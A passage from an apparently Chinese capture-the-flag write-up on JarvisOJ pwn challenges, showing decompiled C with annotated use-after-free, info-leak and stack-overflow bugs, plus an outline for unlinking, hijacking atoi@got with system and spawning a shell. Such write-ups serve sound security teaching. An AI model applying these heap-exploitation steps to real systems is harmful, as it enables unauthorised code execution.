<span class="n">now</span><span class="p">;</span> <span class="k">struct</span> <span class="n">NOTE</span> <span class="n">notes</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span> <span class="p">}</span> <span class="k">struct</span> <span class="n">NOTE</span> <span class="p">{</span> <span class="kt">int</span> <span class="n">inuse</span><span class="p">;</span> <span class="kt">int</span> <span class="n">len</span><span class="p">;</span> <span class="kt">char</span> <span class="o">*</span><span class="n">content</span><span class="p">;</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p>在 delete 函数中存在漏洞</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="kt">void</span> <span class="nf">delPost</span><span class="p">()</span> <span class="p">{</span> <span class="kt">int</span> <span class="n">idx</span><span class="p">;</span> <span class="c1">// [rsp+Ch] [rbp-4h] </span><span class="c1"></span> <span class="k">if</span> <span class="p">(</span> <span class="n">POSTS</span><span class="o">-&gt;</span><span class="n">now</span> <span class="o">&lt;=</span> <span class="mi">0</span> <span class="p">)</span> <span class="p">{</span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;No posts yet.&#34;</span><span class="p">);</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="n">printf</span><span class="p">(</span><span class="s">&#34;Post number: &#34;</span><span class="p">);</span> <span class="n">idx</span> <span class="o">=</span> <span class="n">getInt</span><span class="p">();</span> <span class="k">if</span> <span class="p">(</span> <span class="n">idx</span> <span class="o">&gt;=</span> <span class="mi">0</span> <span class="o">&amp;&amp;</span> <span class="n">idx</span> <span class="o">&lt;</span> <span class="n">POSTS</span><span class="o">-&gt;</span><span class="n">all</span> <span class="p">)</span> <span class="c1">// 2free </span><span class="c1"></span> <span class="p">{</span> <span class="o">--</span><span class="n">POSTS</span><span class="o">-&gt;</span><span class="n">now</span><span class="p">;</span> <span class="n">POSTS</span><span class="o">-&gt;</span><span class="n">block</span><span class="p">[</span><span class="n">idx</span><span class="p">].</span><span class="n">inuse</span> <span class="o">=</span> <span class="mi">0LL</span><span class="p">;</span> <span class="n">POSTS</span><span class="o">-&gt;</span><span class="n">block</span><span class="p">[</span><span class="n">idx</span><span class="p">].</span><span class="n">len</span> <span class="o">=</span> <span class="mi">0LL</span><span class="p">;</span> <span class="n">free</span><span class="p">(</span><span class="n">POSTS</span><span class="o">-&gt;</span><span class="n">block</span><span class="p">[</span><span class="n">idx</span><span class="p">].</span><span class="n">content</span><span class="p">);</span> <span class="c1">// uaf </span><span class="c1"></span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;Done.&#34;</span><span class="p">);</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;Invalid number!&#34;</span><span class="p">);</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p>在 add 和 edit 函数中，新申请的堆块是经过 0x80 对其的，即只能申请 0x80，0x100,0x180 &hellip; 这样的堆块。</p> <p>可以有如下的思路：</p> <ol> <li>先 leak 堆的地址</li> <li>根据 leak 出的堆的地址进行 unlink</li> <li>unlink 后把 chunk_list 中的某一项改成 got（如atoi@got)，这样 show 就可以 leak libc，edit 就可以 hijack got</li> <li>把 atoi@got 改成 system，然后发送 <code>$0\0</code>，<code>sh\0</code> 或 <code>/bin/sh\0</code> 即可 get shell</li> </ol> <p><a href="https://github.com/bash-c/pwn_repo/blob/master/jarvisOJ_Guestbook2/exp.py">exploit here</a></p> <h2 id="xmanlevel6-350">[XMAN]level6 (350)</h2> <p>同上，只不过是 32 位的</p> <h2 id="xmanlevel6_x64-400">[XMAN]level6_x64 (400)</h2> <p>同上</p> <h2 id="61dctfhsys-400">[61dctf]hsys (400)</h2> <p>这个程序也很大，要耐心看。 程序中存在如下的结构体</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="k">struct</span> <span class="n">HACKER</span> <span class="p">{</span> <span class="kt">int</span> <span class="n">id</span><span class="p">;</span> <span class="kt">char</span> <span class="n">name</span><span class="p">[</span><span class="mi">40</span><span class="p">];</span> <span class="kt">char</span> <span class="o">*</span><span class="n">something</span><span class="p">;</span> <span class="kt">int</span> <span class="n">gender</span><span class="p">;</span> <span class="kt">int</span> <span class="n">age</span><span class="p">;</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p>程序给了 <code>list</code>, <code>add</code>, <code>show</code>, <code>info</code>, <code>gender</code> 和 <code>exit</code> 几个功能，通过看代码发现还有一个 <code>del</code> 的隐藏功能，只有 id 为 0 ，即为 admin 的时候才能触发。</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">strcmp</span><span class="p">(</span><span class="n">command</span><span class="p">,</span> <span class="s">&#34;del&#34;</span><span class="p">)</span> <span class="p">)</span> <span class="p">{</span> <span class="k">if</span> <span class="p">(</span> <span class="n">IDX</span> <span class="p">)</span> <span class="p">{</span> <span class="n">v26</span> <span class="o">=</span> <span class="n">printf</span><span class="p">(</span><span class="s">&#34;You must be the system administrator to use del command</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span> <span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span> <span class="n">args</span> <span class="o">&amp;&amp;</span> <span class="n">strlen</span><span class="p">(</span><span class="n">args</span><span class="p">)</span> <span class="p">)</span> <span class="p">{</span> <span class="k">if</span> <span class="p">(</span> <span class="n">delete</span><span class="p">(</span><span class="n">args</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span> <span class="p">)</span> <span class="p">{</span> <span class="n">v16</span> <span class="o">=</span> <span class="n">args</span><span class="p">;</span> <span class="n">v23</span> <span class="o">=</span> <span class="n">printf</span><span class="p">(</span><span class="s">&#34;hacker `%s` not found in system</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">args</span><span class="p">);</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="n">v16</span> <span class="o">=</span> <span class="n">args</span><span class="p">;</span> <span class="n">v14</span> <span class="o">=</span> <span class="n">printf</span><span class="p">(</span><span class="s">&#34;hacker `%s` deleted from system</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">args</span><span class="p">);</span> <span class="n">IDX</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span> <span class="n">v24</span> <span class="o">=</span> <span class="n">v14</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="n">v25</span> <span class="o">=</span> <span class="n">printf</span><span class="p">(</span><span class="s">&#34;usage: del &lt;hacker name&gt;</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span> <span class="p">}</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p>再看 add 的功能，算法渣表示楞了很久才反应过来到这是一个 hash 表 orz。</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="kt">int</span> <span class="kr">__cdecl</span> <span class="nf">getIndex</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">a1</span><span class="p">)</span> <span class="p">{</span> <span class="k">struct</span> <span class="n">HACKER</span> <span class="o">*</span><span class="n">v1</span><span class="p">;</span> <span class="c1">// ST18_4 </span><span class="c1"></span> <span class="kt">int</span> <span class="n">v3</span><span class="p">;</span> <span class="c1">// [esp+1Ch] [ebp-1Ch] </span><span class="c1"></span> <span class="kt">signed</span> <span class="kt">int</span> <span class="n">i</span><span class="p">;</span> <span class="c1">// [esp+20h] [ebp-18h] </span><span class="c1"></span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">v5</span><span class="p">;</span> <span class="c1">// [esp+24h] [ebp-14h] </span><span class="c1"></span> <span class="n">size_t</span> <span class="n">len</span><span class="p">;</span> <span class="c1">// [esp+28h] [ebp-10h] </span><span class="c1"></span> <span class="n">len</span> <span class="o">=</span> <span class="n">strlen</span><span class="p">(</span><span class="n">a1</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span> <span class="n">len</span> <span class="o">&gt;=</span> <span class="mh">0x28</span> <span class="p">)</span> <span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span> <span class="n">v5</span> <span class="o">=</span> <span class="n">getIdxByName</span><span class="p">(</span><span class="n">a1</span><span class="p">);</span> <span class="n">v3</span> <span class="o">=</span> <span class="n">v5</span><span class="p">;</span> <span class="k">for</span> <span class="p">(</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">1338</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span> <span class="p">)</span> <span class="p">{</span> <span class="n">v3</span> <span class="o">=</span> <span class="p">(</span><span class="n">v5</span> <span class="o">+</span> <span class="n">i</span><span class="p">)</span> <span class="o">%</span> <span class="mi">1337</span><span class="p">;</span> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">ptr</span><span class="p">[</span><span class="n">v3</span><span class="p">]</span> <span class="p">)</span> <span class="k">break</span><span class="p">;</span> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">strcmp</span><span class="p">(</span><span class="n">ptr</span><span class="p">[(</span><span class="n">v5</span> <span class="o">+</span> <span class="n">i</span><span class="p">)</span> <span class="o">%</span> <span class="mi">1337</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">name</span><span class="p">,</span> <span class="n">a1</span><span class="p">)</span> <span class="p">)</span> <span class="k">return</span> <span class="p">(</span><span class="n">v5</span> <span class="o">+</span> <span class="n">i</span><span class="p">)</span> <span class="o">%</span> <span class="mi">1337</span><span class="p">;</span> <span class="p">}</span> <span class="n">v1</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x38u</span><span class="p">);</span> <span class="n">v1</span><span class="o">-&gt;</span><span class="n">id</span> <span class="o">=</span> <span class="n">v3</span><span class="p">;</span> <span class="n">memcpy</span><span class="p">(</span><span class="n">v1</span><span class="o">-&gt;</span><span class="n">name</span><span class="p">,</span> <span class="n">a1</span><span class="p">,</span> <span class="n">len</span><span class="p">);</span> <span class="c1">// leakable </span><span class="c1"></span> <span class="n">v1</span><span class="o">-&gt;</span><span class="n">name</span><span class="p">[</span><span class="mi">39</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">v1</span><span class="o">-&gt;</span><span class="n">something</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">ptr</span><span class="p">[</span><span class="n">v3</span><span class="p">]</span> <span class="o">=</span> <span class="n">v1</span><span class="p">;</span> <span class="k">return</span> <span class="n">v3</span><span class="p">;</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p>其中 memcpy 不会在末尾加上 <code>\0</code>，因此是可以 leak 的，可以利用这个来 leak libc</p> <blockquote> <p>打个小广告，找 main_arena 在 libc 中的偏移可以用我写的这个 <a href="https://github.com/bash-c/main_arena_offset#install">小工具</a></p> </blockquote> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">jarvisOJ_hsys <span class="o">[</span>master●●<span class="o">]</span> main_arena ./libc-2.19.so <span class="o">[</span>+<span class="o">]</span>__malloc_hook_offset : 0x1ab408 <span class="o">[</span>+<span class="o">]</span>main_arena_offset : 0x1ab420 </code></pre></td></tr></table> </div> </div><p>继续看其他函数，发现在 <code>show</code> 中有一个 很可疑的<code>memcpy</code>，有可能造成栈溢出</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span><span class="lnt">73 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"> <span class="k">else</span> <span class="nf">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">strcmp</span><span class="p">(</span><span class="n">command</span><span class="p">,</span> <span class="s">&#34;show&#34;</span><span class="p">)</span> <span class="p">)</span> <span class="p">{</span> <span class="k">if</span> <span class="p">(</span> <span class="n">IDX</span> <span class="o">&gt;=</span> <span class="mi">0</span> <span class="p">)</span> <span class="p">{</span> <span class="n">format</span> <span class="o">=</span> <span class="s">&#34;%d: Name: %s, Age %d, Gender: %s, Info: &#34;</span><span class="p">;</span> <span class="n">v42</span> <span class="o">=</span> <span class="mi">128</span><span class="p">;</span> <span class="n">v41</span> <span class="o">=</span> <span class="s">&#34;Male&#34;</span><span class="p">;</span> <span class="n">v40</span> <span class="o">=</span> <span class="s">&#34;Female&#34;</span><span class="p">;</span> <span class="n">s</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">s</span><span class="p">;</span> <span class="n">v38</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">memset</span><span class="p">(</span><span class="o">&amp;</span><span class="n">s</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mh">0x80u</span><span class="p">);</span> <span class="n">Name</span> <span class="o">=</span> <span class="n">ptr</span><span class="p">[</span><span class="n">IDX</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">name</span><span class="p">;</span> <span class="n">Age</span> <span class="o">=</span> <span class="n">ptr</span><span class="p">[</span><span class="n">IDX</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">age</span><span class="p">;</span> <span class="n">Gender</span> <span class="o">=</span> <span class="n">v41</span><span class="p">;</span> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">LOBYTE</span><span class="p">(</span><span class="n">ptr</span><span class="p">[</span><span class="n">IDX</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">gender</span><span class="p">)</span> <span class="p">)</span> <span class="n">Gender</span> <span class="o">=</span> <span class="n">v40</span><span class="p">;</span> <span class="n">v17</span> <span class="o">=</span> <span class="n">IDX</span><span class="p">;</span> <span class="n">v37</span> <span class="o">=</span> <span class="n">sprintf</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="n">format</span><span class="p">,</span> <span class="n">IDX</span><span class="p">,</span> <span class="n">Name</span><span class="p">,</span> <span class="n">Age</span><span class="p">,</span> <span class="n">Gender</span><span class="p">);</span> <span class="n">v36</span> <span class="o">=</span> <span class="n">cntIdx</span><span class="p">(</span><span class="n">IDX</span><span class="p">)</span> <span class="o">+</span> <span class="mi">8</span><span class="p">;</span> <span class="k">if</span> <span class="p">(</span> <span class="n">IDX</span> <span class="p">)</span> <span class="p">{</span> <span class="n">v15</span> <span class="o">=</span> <span class="n">ptr</span><span class="p">[</span><span class="n">IDX</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">name</span><span class="p">;</span> <span class="n">name_len</span> <span class="o">=</span> <span class="n">strlen</span><span class="p">(</span><span class="n">v15</span><span class="p">);</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="n">name_len</span> <span class="o">=</span> <span class="mi">5</span><span class="p">;</span> <span class="c1">// admin </span><span class="c1"></span> <span class="p">}</span> <span class="n">v15</span> <span class="o">=</span> <span class="n">ptr</span><span class="p">[</span><span class="n">IDX</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">age</span><span class="p">;</span> <span class="n">v34</span> <span class="o">=</span> <span class="n">name_len</span> <span class="o">+</span> <span class="n">v36</span> <span class="o">+</span> <span class="mi">6</span><span class="p">;</span> <span class="n">v7</span> <span class="o">=</span> <span class="n">cntIdx</span><span class="p">(</span><span class="n">v15</span><span class="p">);</span> <span class="n">v8</span> <span class="o">=</span> <span class="mi">4</span><span class="p">;</span> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">LOBYTE</span><span class="p">(</span><span class="n">ptr</span><span class="p">[</span><span class="n">IDX</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">gender</span><span class="p">)</span> <span class="p">)</span> <span class="n">v8</span> <span class="o">=</span> <span class="mi">6</span><span class="p">;</span> <span class="n">v63</span> <span class="o">=</span> <span class="n">v8</span> <span class="o">+</span> <span class="n">v7</span> <span class="o">+</span> <span class="n">v34</span> <span class="o">+</span> <span class="mi">10</span> <span class="o">+</span> <span class="mi">8</span><span class="p">;</span> <span class="n">n</span> <span class="o">=</span> <span class="mi">127</span> <span class="o">-</span> <span class="n">v63</span><span class="p">;</span> <span class="k">if</span> <span class="p">(</span> <span class="n">ptr</span><span class="p">[</span><span class="n">IDX</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">something</span> <span class="p">)</span> <span class="p">{</span> <span class="n">v15</span> <span class="o">=</span> <span class="n">ptr</span><span class="p">[</span><span class="n">IDX</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">something</span><span class="p">;</span> <span class="n">v10</span> <span class="o">=</span> <span class="n">strlen</span><span class="p">(</span><span class="n">v15</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span> <span class="n">v10</span> <span class="o">&gt;</span> <span class="n">n</span> <span class="p">)</span> <span class="p">{</span> <span class="n">s</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">s</span><span class="p">;</span> <span class="n">v13</span> <span class="o">=</span> <span class="n">strlen</span><span class="p">(</span><span class="o">&amp;</span><span class="n">s</span><span class="p">);</span> <span class="n">memcpy</span><span class="p">(</span><span class="o">&amp;</span><span class="n">s</span><span class="p">[</span><span class="n">v13</span><span class="p">],</span> <span class="n">ptr</span><span class="p">[</span><span class="n">IDX</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">something</span><span class="p">,</span> <span class="n">n</span><span class="p">);</span> <span class="c1">// overflow </span><span class="c1"></span> <span class="n">v72</span> <span class="o">=</span> <span class="mi">46</span><span class="p">;</span> <span class="n">v73</span> <span class="o">=</span> <span class="mi">46</span><span class="p">;</span> <span class="n">v74</span> <span class="o">=</span> <span class="mi">46</span><span class="p">;</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="n">s</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">s</span><span class="p">;</span> <span class="n">v11</span> <span class="o">=</span> <span class="n">strlen</span><span class="p">(</span><span class="o">&amp;</span><span class="n">s</span><span class="p">);</span> <span class="n">v15</span> <span class="o">=</span> <span class="n">ptr</span><span class="p">[</span><span class="n">IDX</span><span class="p">]</span><span class="o">-&gt;</span><span class="n">something</span><span class="p">;</span> <span class="n">v30</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">s</span><span class="p">[</span><span class="n">v11</span><span class="p">];</span> <span class="n">v29</span> <span class="o">=</span> <span class="n">v15</span><span class="p">;</span> <span class="n">v12</span> <span class="o">=</span> <span class="n">strlen</span><span class="p">(</span><span class="n">v15</span><span class="p">);</span> <span class="n">memcpy</span><span class="p">(</span><span class="n">v30</span><span class="p">,</span> <span class="n">v29</span><span class="p">,</span> <span class="n">v12</span><span class="p">);</span> <span class="p">}</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="n">s</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">s</span><span class="p">;</span> <span class="n">v9</span> <span class="o">=</span> <span class="n">strlen</span><span class="p">(</span><span class="o">&amp;</span><span class="n">s</span><span class="p">);</span> <span class="n">v32</span> <span class="o">=</span> <span class="n">strcpy</span><span class="p">(</span><span class="o">&amp;</span><span class="n">s</span><span class="p">[</span><span class="n">v9</span><span class="p">],</span> <span class="s">&#34;N/A&#34;</span><span class="p">);</span> <span class="p">}</span> <span class="n">v27</span> <span class="o">=</span> <span class="n">puts</span><span class="p">(</span><span class="o">&amp;</span><span class="n">s</span><span class="p">);</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="n">v44</span> <span class="o">=</span> <span class="n">printf</span><span class="p">(</span><span class="s">&#34;You must add a hacker first and then show information about him/her</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span> <span class="p">}</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><ul> <li>为什么会觉得 memcpy 可疑？ <ul> <li>像之前说的，这种代码多的题目一般不会有很难找的漏洞，因此我着重看了 strcpy，memcpy 等危险函数，发现 memcpy 的长度在一定条件下是可以控制的</li> </ul> </li> </ul> <p>这样如果能控制 <code>memcpy</code> 的长度，就可以直接栈溢出来 rop 或者用 one_gadget 了。</p> <p>至于怎么控制长度，我是完全参考了师傅的 writeup，直接给出 <a href="https://veritas501.space/2017/03/10/JarvisOJ_WP/">vertitas501</a> 师傅的链接，就不在这里鹦鹉学舌了。</p> <blockquote> <p>后来复习了一下哈希表的知识发现这个题目还是很好解决的，这种东西果然不用就会忘得一干二净= =</p> </blockquote> <h2 id="61dctfhiphop-400">[61dctf]hiphop (400)</h2> <p>这个题目代码有点多，看了一遍下来是一个打怪兽的程序。逻辑如下：</p> <ol> <li>用户选择技能(change skill)，如果不选择默认为 attack</li> <li>使用技能，分两步进行： <ol> <li>怪兽攻击，用户选择三种防御策略(iceshield, fireshield, windshield)，怪兽的攻击方式随机，如果用户使用了对应的防御策略则成功防御，不扣 hp，否则扣除用户相应 hp</li> <li>用户攻击，每种技能的伤害不同</li> </ol> </li> <li>用户每胜利一次怪兽都会升级一次，不同等级的怪兽有不同的初始 hp(64h, 3E8h, 0BB8h, 7FFFFFFFFFFFFFFEh)；当怪兽升级 3 次以上，用户胜利后即可 get flag</li> </ol> <p>先看一下有没有什么比较特殊的技能，发现 <code>fireball</code> 和 <code>icesword</code> 两个技能会 sleep(1)，再联想到主函数是新开了一个进程处理逻辑的，想到了条件竞争；再仔细看，<code>icesword</code> 的伤害还是负的。</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">strcmp</span><span class="p">(</span><span class="n">a1</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">aAttack</span><span class="p">[</span><span class="mi">32</span><span class="p">])</span> <span class="p">)</span> <span class="p">{</span> <span class="n">fireball</span><span class="p">((</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">5</span><span class="p">);</span> <span class="n">sleep</span><span class="p">(</span><span class="mi">1u</span><span class="p">);</span> <span class="c1">// sleep(1) </span><span class="c1"></span> <span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">strcmp</span><span class="p">(</span><span class="n">a1</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">aAttack</span><span class="p">[</span><span class="mi">192</span><span class="p">])</span> <span class="p">)</span> <span class="p">{</span> <span class="n">icesword</span><span class="p">((</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">5</span><span class="p">);</span> <span class="n">sleep</span><span class="p">(</span><span class="mi">1u</span><span class="p">);</span> <span class="c1">// sleep(1) </span><span class="c1"></span> <span class="p">}</span> <span class="kt">void</span> <span class="kr">__fastcall</span> <span class="n">icesword</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="n">a1</span><span class="p">)</span> <span class="p">{</span> <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">v1</span><span class="p">;</span> <span class="c1">// rbx </span><span class="c1"></span> <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">v2</span><span class="p">;</span> <span class="c1">// rbx </span><span class="c1"></span> <span class="kt">signed</span> <span class="kr">__int64</span> <span class="n">v3</span><span class="p">;</span> <span class="c1">// ST18_8 </span><span class="c1"></span> <span class="n">v1</span> <span class="o">=</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kr">__int16</span><span class="p">)</span><span class="n">rand</span><span class="p">();</span> <span class="n">v2</span> <span class="o">=</span> <span class="p">(</span><span class="n">rand</span><span class="p">()</span> <span class="o">&lt;&lt;</span> <span class="mi">16</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mh">0x8FFFFFFF</span> <span class="o">|</span> <span class="n">v1</span><span class="p">;</span> <span class="n">v3</span> <span class="o">=</span> <span class="n">v2</span> <span class="o">|</span> <span class="p">((</span><span class="kt">signed</span> <span class="kr">__int64</span><span class="p">)</span><span class="n">rand</span><span class="p">()</span> <span class="o">&lt;&lt;</span> <span class="mi">32</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mh">0xFFFF00000000LL</span><span class="p">;</span> <span class="o">*</span><span class="n">a1</span> <span class="o">=</span> <span class="mh">0xFFFFFFFFLL</span><span class="p">;</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p>主函数中可以看出程序使用了 <code>time(0)</code> 